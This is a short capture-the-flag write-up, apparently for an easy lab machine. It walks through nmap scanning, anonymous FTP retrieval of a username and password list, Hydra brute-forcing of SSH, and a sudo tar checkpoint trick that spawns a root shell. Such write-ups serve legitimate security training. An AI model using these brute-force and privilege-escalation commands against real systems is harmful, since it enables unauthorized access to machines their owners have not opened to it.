Difficulty level: Easy
Aim: Hack this machine and obtain the user and root flags.
The target IP address is provided when the machine is deployed.
nmap can be used to discover open ports and services on the target:
nmap -A -vv 10.10.237.37
From this we can see the following ports and services:
- port 21/tcp - FTP - (vsftpd 3.0.3)
- port 22/tcp - SSH - (OpenSSH 7.2p2)
- port 80/tcp - HTTP - (Apache httpd 2.4.18)
Anonymous login is allowed for the FTP service, so that seems a good place to start:
After logging in we can see two text files available for download:
ls get locks.txt get task.txt bye
Once downloaded, the contents of these can be viewed from our local terminal:
cat task.txt cat locks.txt
task.txt give us a potential username:
locks.txt appears to be a wordlist of potential passwords:
The information above can be used with Hydra to brute-force the SSH service:
hydra -l username -P locks.txt ssh://10.10.237.37
Success! We can now log in via SSH:
The user flag can be found within the current directory once logged in.
Taking a look at the sudo permissions shows that we have access to run /bin/tar as the root user:
We can take advantage of this to elevate our privileges and spawn a shell as the root user by running the following command:
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
The '--checkpoint=1' and '--checkpoint-action=exec=/bin/sh' options are passed as command-line options to the tar program, which effectively tells tar to spawn a shell once executed:
The root.txt flag can then be obtained from the /root directory.
cd /root ls cat root.txt
Please feel free to contact me via Twitter and thanks for reading.